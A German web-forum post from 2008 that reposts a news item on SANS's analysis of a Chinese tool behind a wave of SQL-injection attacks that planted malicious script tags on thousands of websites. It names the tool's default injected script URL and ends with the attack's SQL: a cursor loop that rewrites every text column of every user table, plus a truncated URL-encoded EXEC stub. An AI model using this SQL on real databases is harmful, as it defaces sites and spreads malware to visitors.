NetVision-Technik

Zur?ck   NetVision-Technik > Forum > Server > Webserver > Security

Security Hier kommen alle Fragen und Lösungen zur Sicherheit und zu Fixes am Serversystem rein

 
 
Themen-Optionen Ansicht
Alt 17.04.2008, 08:56   #1
SANS lüftet das Mysterium der 10.000 infizierten W
Cerberus Cerberus ist offline 17.04.2008, 08:56

Seite Januar gab es etliche Berichte, dass eine große Anzahl von Webseiten Malware beherbergt. Auch bekannte Seiten waren von den iFrame-Attacken betroffen.

Seither hat man vielerorts gerätselt, wie dieser Massenangriff möglich war. Die Experten vermuteten bereits, dass es sich um Attacken mittels SQL-Einspeisung handelt. Am 15.04.2008 bekam das SANS Internet Storm Center eine weitere Seite zugespielt, die Schadcode beinhaltete. Doch diesmal fand man die ausführbare Datei, die vermutlich von den bösen Buben benutzt wurde.

Man hatte bereits eine Ahnung, wie die Angriffe vor sich gingen. Ebenso wusste man, dass die Attacken automatisiert waren. Über die genaue Funktionsweise wusste man jedoch nichts. Die Taktik ist allerdings relativ simpel. Die Cracker benutzten Suchmaschinen, um potentiell angreifbare Applikationen zu finden. Danach attackierte man diese. Der Exploit ist lediglich ein SQL-Befehl. Dieser versucht ein Script-Tag in jede HTML-Seite der Webseite einzufügen. Das gefundene Werkzeug macht genau dies für den Anwender. Die GUI ist in chinesischer Sprache gehalten.


Nach einer Code-Analyse fand man die einzelnen Arbeitsschritte des Werkzeugs heraus. Der Anwender kann den in die Seite zu einsetzenden Tag manuell konfigurieren. Per Standard würde das Tool das Schnippsel http://www.2117966 (Punkt) net/fuckjp.js injizieren. Danach verbindet sich das Werkzeug zu einer Seite in China. Man vermutet, dass man die Angreifer bezahlen muss, weil ein Script namens pay.asp aufgerufen wird. Als nächsten Schritt kann der Anwender das Tool starten. Es verbindet sich nun zu Google und sucht nach verwundbaren Seiten. Für das „Crawling“ verwendet das Werkzeug einen eingebetteten Browser, der auf bsalsa basiert. Ist eine verwundbare Seite gefunden, wird eine Attacke via SQL-Einspeisung gefahren. Wie das genau vor sich geht müsse man bei SANS erst noch genauer untersuchen. Gut sei die Bestätigung, dass es sich um SQL-Einspeisungen gehandelt habe. Weitere Informationen und ein Bild des bösartigen Werkzeugs finden Sie bei SANS. Um auf der sicheren Seite zu sein sollten Administratoren ihre Applikationen und Webseiten auf Sicherheit überprüfen. (jdo)

sql Code:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR
FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE
a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN
Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''
'
'')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor
DEALLOCATE Table_Cursor
;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(
%20AS%20NVARCHAR(4000));EXEC(@S);--
 

SANS lüftet das Mysterium der 10.000 infizierten Webseiten | Server - News | TecChannel.de
SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc
__________________

Fragen gehören ins Forum - und NICHT in mein Postfach !
Ich erteile KEINEN Privatunterricht über e-mail und PN !

Hackliste Br. NV nach Threadstarter u. Aktualität <--+--> Liste Hacks Bereich NV Alphabethisch

 
Benutzerbild von Cerberus
Cerberus
Administrator
Registriert seit: 07.03.2008
Ort: 3. Bit Links hinter dem Kernel
Alter: 49
Beitr?ge: 9.639
Abgegebene Danke: 1.121
Erhielt 4.499 Danke für 458 Beiträge
Downloads: 18
Uploads: 9
Nachrichten: 2258
Hits: 11788
Mit Zitat antworten
Folgende 3 Benutzer sagen Danke zu Cerberus für den nützlichen Beitrag:
desaster (17.04.2008), Pr1me (17.04.2008), storker (17.04.2008)
 


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, G?ste: 1)
 

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beitr?ge zu antworten.
Es ist Ihnen nicht erlaubt, Anh?nge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beitr?ge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.

Gehe zu


Alle Zeitangaben in WEZ +1. Es ist jetzt 07:21 Uhr.


Powered by vBulletin® Version 3.8.9 (Deutsch)
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
Template-Modifikationen durch TMS